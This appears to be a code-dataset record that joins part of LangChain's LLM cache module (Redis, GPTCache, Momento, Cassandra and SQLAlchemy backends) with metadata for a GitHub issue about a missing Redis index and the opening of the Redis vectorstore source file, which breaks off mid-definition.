index_name = self._index_name(kwargs["llm_string"])
if index_name in self._cache_dict:
self._cache_dict[index_name].drop_index(
index_name=index_name, delete_documents=True, redis_url=self.redis_url
)
del self._cache_dict[index_name]
def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]:
"""Look up based on prompt and llm_string."""
llm_cache = self._get_llm_cache(llm_string)
generations: List = []
# Read from a Hash
results = llm_cache.similarity_search(
query=prompt,
k=1,
distance_threshold=self.score_threshold,
)
if results:
for document in results:
try:
generations.extend(loads(document.metadata["return_val"]))
except Exception:
logger.warning(
"Retrieving a cache value that could not be deserialized "
"properly. This is likely due to the cache being in an "
"older format. Please recreate your cache to avoid this "
"error."
)
# In a previous life we stored the raw text directly
# in the table, so assume it's in that format.
generations.extend(
_load_generations_from_json(document.metadata["return_val"])
)
return generations if generations else None
def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None:
"""Update cache based on prompt and llm_string."""
for gen in return_val:
if not isinstance(gen, Generation):
raise ValueError(
"RedisSemanticCache only supports caching of "
f"normal LLM generations, got {type(gen)}"
)
llm_cache = self._get_llm_cache(llm_string)
metadata = {
"llm_string": llm_string,
"prompt": prompt,
"return_val": dumps([g for g in return_val]),
}
llm_cache.add_texts(texts=[prompt], metadatas=[metadata])
class GPTCache(BaseCache):
"""Cache that uses GPTCache as a backend."""
def __init__(
self,
init_func: Union[
Callable[[Any, str], None], Callable[[Any], None], None
] = None,
):
"""Initialize by passing in init function (default: `None`).
Args:
init_func (Optional[Callable[[Any], None]]): init `GPTCache` function
(default: `None`)
Example:
.. code-block:: python
# Initialize GPTCache with a custom init function
import gptcache
from gptcache.processor.pre import get_prompt
from gptcache.manager.factory import get_data_manager
from langchain.globals import set_llm_cache
# Avoid multiple caches using the same file,
causing different llm model caches to affect each other
def init_gptcache(cache_obj: gptcache.Cache, llm str):
cache_obj.init(
pre_embedding_func=get_prompt,
data_manager=manager_factory(
manager="map",
data_dir=f"map_cache_{llm}"
),
)
set_llm_cache(GPTCache(init_gptcache))
"""
try:
import gptcache # noqa: F401
except ImportError:
raise ImportError(
"Could not import gptcache python package. "
"Please install it with `pip install gptcache`."
)
self.init_gptcache_func: Union[
Callable[[Any, str], None], Callable[[Any], None], None
] = init_func
self.gptcache_dict: Dict[str, Any] = {}
def _new_gptcache(self, llm_string: str) -> Any:
"""New gptcache object"""
from gptcache import Cache
from gptcache.manager.factory import get_data_manager
from gptcache.processor.pre import get_prompt
_gptcache = Cache()
if self.init_gptcache_func is not None:
sig = inspect.signature(self.init_gptcache_func)
if len(sig.parameters) == 2:
self.init_gptcache_func(_gptcache, llm_string) # type: ignore[call-arg]
else:
self.init_gptcache_func(_gptcache) # type: ignore[call-arg]
else:
_gptcache.init(
pre_embedding_func=get_prompt,
data_manager=get_data_manager(data_path=llm_string),
)
self.gptcache_dict[llm_string] = _gptcache
return _gptcache
def _get_gptcache(self, llm_string: str) -> Any:
"""Get a cache object.
When the corresponding llm model cache does not exist, it will be created."""
_gptcache = self.gptcache_dict.get(llm_string, None)
if not _gptcache:
_gptcache = self._new_gptcache(llm_string)
return _gptcache
def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]:
"""Look up the cache data.
First, retrieve the corresponding cache object using the `llm_string` parameter,
and then retrieve the data from the cache based on the `prompt`.
"""
from gptcache.adapter.api import get
_gptcache = self._get_gptcache(llm_string)
res = get(prompt, cache_obj=_gptcache)
if res:
return [
Generation(**generation_dict) for generation_dict in json.loads(res)
]
return None
def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None:
"""Update cache.
First, retrieve the corresponding cache object using the `llm_string` parameter,
and then store the `prompt` and `return_val` in the cache object.
"""
for gen in return_val:
if not isinstance(gen, Generation):
raise ValueError(
"GPTCache only supports caching of normal LLM generations, "
f"got {type(gen)}"
)
from gptcache.adapter.api import put
_gptcache = self._get_gptcache(llm_string)
handled_data = json.dumps([generation.dict() for generation in return_val])
put(prompt, handled_data, cache_obj=_gptcache)
return None
def clear(self, **kwargs: Any) -> None:
"""Clear cache."""
from gptcache import Cache
for gptcache_instance in self.gptcache_dict.values():
gptcache_instance = cast(Cache, gptcache_instance)
gptcache_instance.flush()
self.gptcache_dict.clear()
def _ensure_cache_exists(cache_client: momento.CacheClient, cache_name: str) -> None:
"""Create cache if it doesn't exist.
Raises:
SdkException: Momento service or network error
Exception: Unexpected response
"""
from momento.responses import CreateCache
create_cache_response = cache_client.create_cache(cache_name)
if isinstance(create_cache_response, CreateCache.Success) or isinstance(
create_cache_response, CreateCache.CacheAlreadyExists
):
return None
elif isinstance(create_cache_response, CreateCache.Error):
raise create_cache_response.inner_exception
else:
raise Exception(f"Unexpected response cache creation: {create_cache_response}")
def _validate_ttl(ttl: Optional[timedelta]) -> None:
if ttl is not None and ttl <= timedelta(seconds=0):
raise ValueError(f"ttl must be positive but was {ttl}.")
class MomentoCache(BaseCache):
"""Cache that uses Momento as a backend. See https://gomomento.com/"""
def __init__(
self,
cache_client: momento.CacheClient,
cache_name: str,
*,
ttl: Optional[timedelta] = None,
ensure_cache_exists: bool = True,
):
"""Instantiate a prompt cache using Momento as a backend.
Note: to instantiate the cache client passed to MomentoCache,
you must have a Momento account. See https://gomomento.com/.
Args:
cache_client (CacheClient): The Momento cache client.
cache_name (str): The name of the cache to use to store the data.
ttl (Optional[timedelta], optional): The time to live for the cache items.
Defaults to None, ie use the client default TTL.
ensure_cache_exists (bool, optional): Create the cache if it doesn't
exist. Defaults to True.
Raises:
ImportError: Momento python package is not installed.
TypeError: cache_client is not of type momento.CacheClientObject
ValueError: ttl is non-null and non-negative
"""
try:
from momento import CacheClient
except ImportError:
raise ImportError(
"Could not import momento python package. "
"Please install it with `pip install momento`."
)
if not isinstance(cache_client, CacheClient):
raise TypeError("cache_client must be a momento.CacheClient object.")
_validate_ttl(ttl)
if ensure_cache_exists:
_ensure_cache_exists(cache_client, cache_name)
self.cache_client = cache_client
self.cache_name = cache_name
self.ttl = ttl
@classmethod
def from_client_params(
cls,
cache_name: str,
ttl: timedelta,
*,
configuration: Optional[momento.config.Configuration] = None,
api_key: Optional[str] = None,
auth_token: Optional[str] = None, # for backwards compatibility
**kwargs: Any,
) -> MomentoCache:
"""Construct cache from CacheClient parameters."""
try:
from momento import CacheClient, Configurations, CredentialProvider
except ImportError:
raise ImportError(
"Could not import momento python package. "
"Please install it with `pip install momento`."
)
if configuration is None:
configuration = Configurations.Laptop.v1()
# Try checking `MOMENTO_AUTH_TOKEN` first for backwards compatibility
try:
api_key = auth_token or get_from_env("auth_token", "MOMENTO_AUTH_TOKEN")
except ValueError:
api_key = api_key or get_from_env("api_key", "MOMENTO_API_KEY")
credentials = CredentialProvider.from_string(api_key)
cache_client = CacheClient(configuration, credentials, default_ttl=ttl)
return cls(cache_client, cache_name, ttl=ttl, **kwargs)
def __key(self, prompt: str, llm_string: str) -> str:
"""Compute cache key from prompt and associated model and settings.
Args:
prompt (str): The prompt run through the language model.
llm_string (str): The language model version and settings.
Returns:
str: The cache key.
"""
return _hash(prompt + llm_string)
def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]:
"""Lookup llm generations in cache by prompt and associated model and settings.
Args:
prompt (str): The prompt run through the language model.
llm_string (str): The language model version and settings.
Raises:
SdkException: Momento service or network error
Returns:
Optional[RETURN_VAL_TYPE]: A list of language model generations.
"""
from momento.responses import CacheGet
generations: RETURN_VAL_TYPE = []
get_response = self.cache_client.get(
self.cache_name, self.__key(prompt, llm_string)
)
if isinstance(get_response, CacheGet.Hit):
value = get_response.value_string
generations = _load_generations_from_json(value)
elif isinstance(get_response, CacheGet.Miss):
pass
elif isinstance(get_response, CacheGet.Error):
raise get_response.inner_exception
return generations if generations else None
def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None:
"""Store llm generations in cache.
Args:
prompt (str): The prompt run through the language model.
llm_string (str): The language model string.
return_val (RETURN_VAL_TYPE): A list of language model generations.
Raises:
SdkException: Momento service or network error
Exception: Unexpected response
"""
for gen in return_val:
if not isinstance(gen, Generation):
raise ValueError(
"Momento only supports caching of normal LLM generations, "
f"got {type(gen)}"
)
key = self.__key(prompt, llm_string)
value = _dump_generations_to_json(return_val)
set_response = self.cache_client.set(self.cache_name, key, value, self.ttl)
from momento.responses import CacheSet
if isinstance(set_response, CacheSet.Success):
pass
elif isinstance(set_response, CacheSet.Error):
raise set_response.inner_exception
else:
raise Exception(f"Unexpected response: {set_response}")
def clear(self, **kwargs: Any) -> None:
"""Clear the cache.
Raises:
SdkException: Momento service or network error
"""
from momento.responses import CacheFlush
flush_response = self.cache_client.flush_cache(self.cache_name)
if isinstance(flush_response, CacheFlush.Success):
pass
elif isinstance(flush_response, CacheFlush.Error):
raise flush_response.inner_exception
CASSANDRA_CACHE_DEFAULT_TABLE_NAME = "langchain_llm_cache"
CASSANDRA_CACHE_DEFAULT_TTL_SECONDS = None
class CassandraCache(BaseCache):
"""
Cache that uses Cassandra / Astra DB as a backend.
It uses a single Cassandra table.
The lookup keys (which get to form the primary key) are:
- prompt, a string
- llm_string, a deterministic str representation of the model parameters.
(needed to prevent collisions same-prompt-different-model collisions)
"""
def __init__(
self,
session: Optional[CassandraSession] = None,
keyspace: Optional[str] = None,
table_name: str = CASSANDRA_CACHE_DEFAULT_TABLE_NAME,
ttl_seconds: Optional[int] = CASSANDRA_CACHE_DEFAULT_TTL_SECONDS,
skip_provisioning: bool = False,
):
"""
Initialize with a ready session and a keyspace name.
Args:
session (cassandra.cluster.Session): an open Cassandra session
keyspace (str): the keyspace to use for storing the cache
table_name (str): name of the Cassandra table to use as cache
ttl_seconds (optional int): time-to-live for cache entries
(default: None, i.e. forever)
"""
try:
from cassio.table import ElasticCassandraTable
except (ImportError, ModuleNotFoundError):
raise ValueError(
"Could not import cassio python package. "
"Please install it with `pip install cassio`."
)
self.session = session
self.keyspace = keyspace
self.table_name = table_name
self.ttl_seconds = ttl_seconds
self.kv_cache = ElasticCassandraTable(
session=self.session,
keyspace=self.keyspace,
table=self.table_name,
keys=["llm_string", "prompt"],
primary_key_type=["TEXT", "TEXT"],
ttl_seconds=self.ttl_seconds,
skip_provisioning=skip_provisioning,
)
def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]:
"""Look up based on prompt and llm_string."""
item = self.kv_cache.get(
llm_string=_hash(llm_string),
prompt=_hash(prompt),
)
if item is not None:
generations = _loads_generations(item["body_blob"])
# this protects against malformed cached items:
if generations is not None:
return generations
else:
return None
else:
return None
def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None:
"""Update cache based on prompt and llm_string."""
blob = _dumps_generations(return_val)
self.kv_cache.put(
llm_string=_hash(llm_string),
prompt=_hash(prompt),
body_blob=blob,
)
def delete_through_llm(
self, prompt: str, llm: LLM, stop: Optional[List[str]] = None
) -> None:
"""
A wrapper around `delete` with the LLM being passed.
In case the llm(prompt) calls have a `stop` param, you should pass it here
"""
llm_string = get_prompts(
{**llm.dict(), **{"stop": stop}},
[],
)[1]
return self.delete(prompt, llm_string=llm_string)
def delete(self, prompt: str, llm_string: str) -> None:
"""Evict from cache if there's an entry."""
return self.kv_cache.delete(
llm_string=_hash(llm_string),
prompt=_hash(prompt),
)
def clear(self, **kwargs: Any) -> None:
"""Clear cache. This is for all LLMs at once."""
self.kv_cache.clear()
CASSANDRA_SEMANTIC_CACHE_DEFAULT_DISTANCE_METRIC = "dot"
CASSANDRA_SEMANTIC_CACHE_DEFAULT_SCORE_THRESHOLD = 0.85
CASSANDRA_SEMANTIC_CACHE_DEFAULT_TABLE_NAME = "langchain_llm_semantic_cache"
CASSANDRA_SEMANTIC_CACHE_DEFAULT_TTL_SECONDS = None
CASSANDRA_SEMANTIC_CACHE_EMBEDDING_CACHE_SIZE = 16
class CassandraSemanticCache(BaseCache):
"""
Cache that uses Cassandra as a vector-store backend for semantic
(i.e. similarity-based) lookup.
It uses a single (vector) Cassandra table and stores, in principle,
cached values from several LLMs, so the LLM's llm_string is part
of the rows' primary keys.
The similarity is based on one of several distance metrics (default: "dot").
If choosing another metric, the default threshold is to be re-tuned accordingly.
"""
def __init__(
self,
session: Optional[CassandraSession],
keyspace: Optional[str],
embedding: Embeddings,
table_name: str = CASSANDRA_SEMANTIC_CACHE_DEFAULT_TABLE_NAME,
distance_metric: str = CASSANDRA_SEMANTIC_CACHE_DEFAULT_DISTANCE_METRIC,
score_threshold: float = CASSANDRA_SEMANTIC_CACHE_DEFAULT_SCORE_THRESHOLD,
ttl_seconds: Optional[int] = CASSANDRA_SEMANTIC_CACHE_DEFAULT_TTL_SECONDS,
skip_provisioning: bool = False,
):
"""
Initialize the cache with all relevant parameters.
Args:
session (cassandra.cluster.Session): an open Cassandra session
keyspace (str): the keyspace to use for storing the cache
embedding (Embedding): Embedding provider for semantic
encoding and search.
table_name (str): name of the Cassandra (vector) table
to use as cache
distance_metric (str, 'dot'): which measure to adopt for
similarity searches
score_threshold (optional float): numeric value to use as
cutoff for the similarity searches
ttl_seconds (optional int): time-to-live for cache entries
(default: None, i.e. forever)
The default score threshold is tuned to the default metric.
Tune it carefully yourself if switching to another distance metric.
"""
try:
from cassio.table import MetadataVectorCassandraTable
except (ImportError, ModuleNotFoundError):
raise ValueError(
"Could not import cassio python package. "
"Please install it with `pip install cassio`."
)
self.session = session
self.keyspace = keyspace
self.embedding = embedding
self.table_name = table_name
self.distance_metric = distance_metric
self.score_threshold = score_threshold
self.ttl_seconds = ttl_seconds
# The contract for this class has separate lookup and update:
# in order to spare some embedding calculations we cache them between
# the two calls.
# Note: each instance of this class has its own `_get_embedding` with
# its own lru.
@lru_cache(maxsize=CASSANDRA_SEMANTIC_CACHE_EMBEDDING_CACHE_SIZE)
def _cache_embedding(text: str) -> List[float]:
return self.embedding.embed_query(text=text)
self._get_embedding = _cache_embedding
self.embedding_dimension = self._get_embedding_dimension()
self.table = MetadataVectorCassandraTable(
session=self.session,
keyspace=self.keyspace,
table=self.table_name,
primary_key_type=["TEXT"],
vector_dimension=self.embedding_dimension,
ttl_seconds=self.ttl_seconds,
metadata_indexing=("allow", {"_llm_string_hash"}),
skip_provisioning=skip_provisioning,
)
def _get_embedding_dimension(self) -> int:
return len(self._get_embedding(text="This is a sample sentence."))
def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None:
"""Update cache based on prompt and llm_string."""
embedding_vector = self._get_embedding(text=prompt)
llm_string_hash = _hash(llm_string)
body = _dumps_generations(return_val)
metadata = {
"_prompt": prompt,
"_llm_string_hash": llm_string_hash,
}
row_id = f"{_hash(prompt)}-{llm_string_hash}"
#
self.table.put(
body_blob=body,
vector=embedding_vector,
row_id=row_id,
metadata=metadata,
)
def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]:
"""Look up based on prompt and llm_string."""
hit_with_id = self.lookup_with_id(prompt, llm_string)
if hit_with_id is not None:
return hit_with_id[1]
else:
return None
def lookup_with_id(
self, prompt: str, llm_string: str
) -> Optional[Tuple[str, RETURN_VAL_TYPE]]:
"""
Look up based on prompt and llm_string.
If there are hits, return (document_id, cached_entry)
"""
prompt_embedding: List[float] = self._get_embedding(text=prompt)
hits = list(
self.table.metric_ann_search(
vector=prompt_embedding,
metadata={"_llm_string_hash": _hash(llm_string)},
n=1,
metric=self.distance_metric,
metric_threshold=self.score_threshold,
)
)
if hits:
hit = hits[0]
generations = _loads_generations(hit["body_blob"])
if generations is not None:
# this protects against malformed cached items:
return (
hit["row_id"],
generations,
)
else:
return None
else:
return None
def lookup_with_id_through_llm(
self, prompt: str, llm: LLM, stop: Optional[List[str]] = None
) -> Optional[Tuple[str, RETURN_VAL_TYPE]]:
llm_string = get_prompts(
{**llm.dict(), **{"stop": stop}},
[],
)[1]
return self.lookup_with_id(prompt, llm_string=llm_string)
def delete_by_document_id(self, document_id: str) -> None:
"""
Given this is a "similarity search" cache, an invalidation pattern
that makes sense is first a lookup to get an ID, and then deleting
with that ID. This is for the second step.
"""
self.table.delete(row_id=document_id)
def clear(self, **kwargs: Any) -> None:
"""Clear the *whole* semantic cache."""
self.table.clear()
class FullMd5LLMCache(Base): # type: ignore
"""SQLite table for full LLM Cache (all generations)."""
__tablename__ = "full_md5_llm_cache"
id = Column(String, primary_key=True)
prompt_md5 = Column(String, index=True)
llm = Column(String, index=True)
idx = Column(Integer, index=True)
prompt = Column(String)
response = Column(String)
class SQLAlchemyMd5Cache(BaseCache):
"""Cache that uses SQAlchemy as a backend."""
def __init__(
self, engine: Engine, cache_schema: Type[FullMd5LLMCache] = FullMd5LLMCache
):
"""Initialize by creating all tables."""
self.engine = engine
self.cache_schema = cache_schema
self.cache_schema.metadata.create_all(self.engine)
def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]:
"""Look up based on prompt and llm_string."""
rows = self._search_rows(prompt, llm_string)
if rows:
return [loads(row[0]) for row in rows]
return None
def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None:
"""Update based on prompt and llm_string."""
self._delete_previous(prompt, llm_string)
prompt_md5 = self.get_md5(prompt)
items = [
self.cache_schema(
id=str(uuid.uuid1()),
prompt=prompt,
prompt_md5=prompt_md5,
llm=llm_string,
response=dumps(gen),
idx=i,
)
for i, gen in enumerate(return_val)
]
with Session(self.engine) as session, session.begin():
for item in items:
session.merge(item)
def _delete_previous(self, prompt: str, llm_string: str) -> None:
stmt = (
select(self.cache_schema.response)
.where(self.cache_schema.prompt_md5 == self.get_md5(prompt)) # type: ignore
.where(self.cache_schema.llm == llm_string)
.where(self.cache_schema.prompt == prompt)
.order_by(self.cache_schema.idx)
)
with Session(self.engine) as session, session.begin():
rows = session.execute(stmt).fetchall()
for item in rows:
session.delete(item)
def _search_rows(self, prompt: str, llm_string: str) -> List[Row]:
prompt_pd5 = self.get_md5(prompt)
stmt = (
select(self.cache_schema.response)
.where(self.cache_schema.prompt_md5 == prompt_pd5) # type: ignore
.where(self.cache_schema.llm == llm_string)
.where(self.cache_schema.prompt == prompt)
.order_by(self.cache_schema.idx)
)
with Session(self.engine) as session:
return session.execute(stmt).fetchall()
def clear(self, **kwargs: Any) -> None:
"""Clear cache."""
with Session(self.engine) as session:
session.execute(self.cache_schema.delete())
@staticmethod
def get_md5(input_string: str) -> str:
return hashlib.md5(input_string.encode()).hexdigest()
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:
![Screenshot from 2023-09-28 16-57-03](https://github.com/langchain-ai/langchain/assets/81446007/afae536e-7888-4183-93d0-bfa65a8845a2)
### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
![Screenshot from 2023-09-28 16-13-18](https://github.com/langchain-ai/langchain/assets/81446007/281206ed-b7c6-4b18-a3cc-25874fec7a06)
The error is here:
![Screenshot from 2023-09-28 16-32-00](https://github.com/langchain-ai/langchain/assets/81446007/f6bf52fb-d0ef-4f38-b247-475522bdfece)
If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/vectorstores/redis/base.py | """Wrapper around Redis vector database."""
from __future__ import annotations
import logging
import os
import uuid
from typing import (
TYPE_CHECKING,
Any,
Callable,
Dict,
Iterable,
List,
Mapping,
Optional,
Tuple,
Type,
Union,
cast,
)
import numpy as np
import yaml
from langchain._api import deprecated
from langchain.callbacks.manager import (
AsyncCallbackManagerForRetrieverRun,
CallbackManagerForRetrieverRun,
)
from langchain.docstore.document import Document
from langchain.schema.embeddings import Embeddings
from langchain.schema.vectorstore import VectorStore, VectorStoreRetriever
from langchain.utilities.redis import (
_array_to_buffer,
_buffer_to_array,
check_redis_module_exist,
get_client,
)
from langchain.utils import get_from_dict_or_env
from langchain.vectorstores.redis.constants import (
REDIS_REQUIRED_MODULES,
REDIS_TAG_SEPARATOR,
)
from langchain.vectorstores.utils import maximal_marginal_relevance
logger = logging.getLogger(__name__)
if TYPE_CHECKING:
from redis.client import Redis as RedisType
from redis.commands.search.query import Query
from langchain.vectorstores.redis.filters import RedisFilterExpression
from langchain.vectorstores.redis.schema import RedisModel
def _redis_key(prefix: str) -> str:
"""Redis key schema for a given prefix."""
return f"{prefix}:{uuid.uuid4().hex}"
def _redis_prefix(index_name: str) -> str:
"""Redis key prefix for a given index."""
return f"doc:{index_name}"
def _default_relevance_score(val: float) -> float:
return 1 - val
def check_index_exists(client: RedisType, index_name: str) -> bool:
"""Check if Redis index exists."""
try:
client.ft(index_name).info()
except: # noqa: E722
logger.info("Index does not exist")
return False
logger.info("Index already exists")
return True
class Redis(VectorStore):
"""Redis vector database.
To use, you should have the ``redis`` python package installed
and have a running Redis Enterprise or Redis-Stack server
For production use cases, it is recommended to use Redis Enterprise
as the scaling, performance, stability and availability is much
better than Redis-Stack.
For testing and prototyping, however, this is not required.
Redis-Stack is available as a docker container the full vector
search API available.
.. code-block:: bash
# to run redis stack in docker locally
docker run -d -p 6379:6379 -p 8001:8001 redis/redis-stack:latest
Once running, you can connect to the redis server with the following url schemas:
- redis://<host>:<port> # simple connection
- redis://<username>:<password>@<host>:<port> # connection with authentication
- rediss://<host>:<port> # connection with SSL
- rediss://<username>:<password>@<host>:<port> # connection with SSL and auth
Examples:
The following examples show various ways to use the Redis VectorStore with
LangChain.
For all the following examples assume we have the following imports:
.. code-block:: python
from langchain.vectorstores import Redis
from langchain.embeddings import OpenAIEmbeddings
Initialize, create index, and load Documents
.. code-block:: python
from langchain.vectorstores import Redis
from langchain.embeddings import OpenAIEmbeddings
rds = Redis.from_documents(
documents, # a list of Document objects from loaders or created
embeddings, # an Embeddings object
redis_url="redis://localhost:6379",
)
Initialize, create index, and load Documents with metadata
.. code-block:: python
rds = Redis.from_texts(
texts, # a list of strings
metadata, # a list of metadata dicts
embeddings, # an Embeddings object
redis_url="redis://localhost:6379",
)
Initialize, create index, and load Documents with metadata and return keys
.. code-block:: python
rds, keys = Redis.from_texts_return_keys(
texts, # a list of strings
metadata, # a list of metadata dicts
embeddings, # an Embeddings object
redis_url="redis://localhost:6379",
)
For use cases where the index needs to stay alive, you can initialize
with an index name such that it's easier to reference later
.. code-block:: python
rds = Redis.from_texts(
texts, # a list of strings
metadata, # a list of metadata dicts
embeddings, # an Embeddings object
index_name="my-index",
redis_url="redis://localhost:6379",
)
Initialize and connect to an existing index (from above)
.. code-block:: python
rds = Redis.from_existing_index(
embeddings, # an Embeddings object
index_name="my-index",
redis_url="redis://localhost:6379",
)
Advanced examples:
Custom vector schema can be supplied to change the way that
Redis creates the underlying vector schema. This is useful
for production use cases where you want to optimize the
vector schema for your use case. ex. using HNSW instead of
FLAT (knn) which is the default
.. code-block:: python
vector_schema = {
"algorithm": "HNSW"
}
rds = Redis.from_texts(
texts, # a list of strings
metadata, # a list of metadata dicts
embeddings, # an Embeddings object
vector_schema=vector_schema,
redis_url="redis://localhost:6379",
)
Custom index schema can be supplied to change the way that the
metadata is indexed. This is useful for you would like to use the
hybrid querying (filtering) capability of Redis.
By default, this implementation will automatically generate the index
schema according to the following rules:
- All strings are indexed as text fields
- All numbers are indexed as numeric fields
- All lists of strings are indexed as tag fields (joined by
langchain.vectorstores.redis.constants.REDIS_TAG_SEPARATOR)
- All None values are not indexed but still stored in Redis these are
not retrievable through the interface here, but the raw Redis client
can be used to retrieve them.
- All other types are not indexed
To override these rules, you can pass in a custom index schema like the following
.. code-block:: yaml
tag:
- name: credit_score
text:
- name: user
- name: job
Typically, the ``credit_score`` field would be a text field since it's a string,
however, we can override this behavior by specifying the field type as shown with
the yaml config (can also be a dictionary) above and the code below.
.. code-block:: python
rds = Redis.from_texts(
texts, # a list of strings
metadata, # a list of metadata dicts
embeddings, # an Embeddings object
index_schema="path/to/index_schema.yaml", # can also be a dictionary
redis_url="redis://localhost:6379",
)
When connecting to an existing index where a custom schema has been applied, it's
important to pass in the same schema to the ``from_existing_index`` method.
Otherwise, the schema for newly added samples will be incorrect and metadata
will not be returned.
"""
DEFAULT_VECTOR_SCHEMA = {
"name": "content_vector",
"algorithm": "FLAT",
"dims": 1536,
"distance_metric": "COSINE",
"datatype": "FLOAT32",
}
def __init__(
self,
redis_url: str,
index_name: str,
embedding: Embeddings,
index_schema: Optional[Union[Dict[str, str], str, os.PathLike]] = None,
vector_schema: Optional[Dict[str, Union[str, int]]] = None,
relevance_score_fn: Optional[Callable[[float], float]] = None,
**kwargs: Any,
):
"""Initialize with necessary components."""
self._check_deprecated_kwargs(kwargs)
try:
# TODO use importlib to check if redis is installed
import redis # noqa: F401
except ImportError as e:
raise ImportError(
"Could not import redis python package. "
"Please install it with `pip install redis`."
) from e
self.index_name = index_name
self._embeddings = embedding
try:
redis_client = get_client(redis_url=redis_url, **kwargs)
# check if redis has redisearch module installed
check_redis_module_exist(redis_client, REDIS_REQUIRED_MODULES)
except ValueError as e:
raise ValueError(f"Redis failed to connect: {e}")
self.client = redis_client
self.relevance_score_fn = relevance_score_fn
self._schema = self._get_schema_with_defaults(index_schema, vector_schema)
@property
def embeddings(self) -> Optional[Embeddings]:
"""Access the query embedding object if available."""
return self._embeddings
@classmethod
def from_texts_return_keys(
cls,
texts: List[str],
embedding: Embeddings,
metadatas: Optional[List[dict]] = None,
index_name: Optional[str] = None,
index_schema: Optional[Union[Dict[str, str], str, os.PathLike]] = None,
vector_schema: Optional[Dict[str, Union[str, int]]] = None,
**kwargs: Any,
) -> Tuple[Redis, List[str]]:
"""Create a Redis vectorstore from raw documents.
This is a user-friendly interface that:
1. Embeds documents.
2. Creates a new Redis index if it doesn't already exist
3. Adds the documents to the newly created Redis index.
4. Returns the keys of the newly created documents once stored.
This method will generate schema based on the metadata passed in
if the `index_schema` is not defined. If the `index_schema` is defined,
it will compare against the generated schema and warn if there are
differences. If you are purposefully defining the schema for the
metadata, then you can ignore that warning.
To examine the schema options, initialize an instance of this class
and print out the schema using the `Redis.schema`` property. This
will include the content and content_vector classes which are
always present in the langchain schema.
Example:
.. code-block:: python
from langchain.vectorstores import Redis
from langchain.embeddings import OpenAIEmbeddings
embeddings = OpenAIEmbeddings()
redis, keys = Redis.from_texts_return_keys(
texts,
embeddings,
redis_url="redis://localhost:6379"
)
Args:
texts (List[str]): List of texts to add to the vectorstore.
embedding (Embeddings): Embeddings to use for the vectorstore.
metadatas (Optional[List[dict]], optional): Optional list of metadata
dicts to add to the vectorstore. Defaults to None.
index_name (Optional[str], optional): Optional name of the index to
create or add to. Defaults to None.
index_schema (Optional[Union[Dict[str, str], str, os.PathLike]], optional):
Optional fields to index within the metadata. Overrides generated
schema. Defaults to None.
vector_schema (Optional[Dict[str, Union[str, int]]], optional): Optional
vector schema to use. Defaults to None.
**kwargs (Any): Additional keyword arguments to pass to the Redis client.
Returns:
Tuple[Redis, List[str]]: Tuple of the Redis instance and the keys of
the newly created documents.
Raises:
ValueError: If the number of metadatas does not match the number of texts.
"""
try:
# TODO use importlib to check if redis is installed
import redis # noqa: F401
from langchain.vectorstores.redis.schema import read_schema
except ImportError as e:
raise ImportError(
"Could not import redis python package. "
"Please install it with `pip install redis`."
) from e
redis_url = get_from_dict_or_env(kwargs, "redis_url", "REDIS_URL")
if "redis_url" in kwargs:
kwargs.pop("redis_url")
# flag to use generated schema
if "generate" in kwargs:
kwargs.pop("generate")
# see if the user specified keys
keys = None
if "keys" in kwargs:
keys = kwargs.pop("keys")
# Name of the search index if not given
if not index_name:
index_name = uuid.uuid4().hex
# type check for metadata
if metadatas:
if isinstance(metadatas, list) and len(metadatas) != len(texts): # type: ignore # noqa: E501
raise ValueError("Number of metadatas must match number of texts")
if not (isinstance(metadatas, list) and isinstance(metadatas[0], dict)):
raise ValueError("Metadatas must be a list of dicts")
generated_schema = _generate_field_schema(metadatas[0])
if index_schema:
# read in the schema solely to compare to the generated schema
user_schema = read_schema(index_schema)
# the very rare case where a super user decides to pass the index
# schema and a document loader is used that has metadata which
# we need to map into fields.
if user_schema != generated_schema:
logger.warning(
"`index_schema` does not match generated metadata schema.\n"
+ "If you meant to manually override the schema, please "
+ "ignore this message.\n"
+ f"index_schema: {user_schema}\n"
+ f"generated_schema: {generated_schema}\n"
)
else:
# use the generated schema
index_schema = generated_schema
# Create instance
instance = cls(
redis_url,
index_name,
embedding,
index_schema=index_schema,
vector_schema=vector_schema,
**kwargs,
)
# Create embeddings over documents
embeddings = embedding.embed_documents(texts)
# Create the search index
instance._create_index(dim=len(embeddings[0]))
# Add data to Redis
keys = instance.add_texts(texts, metadatas, embeddings, keys=keys)
return instance, keys
@classmethod
def from_texts(
cls: Type[Redis],
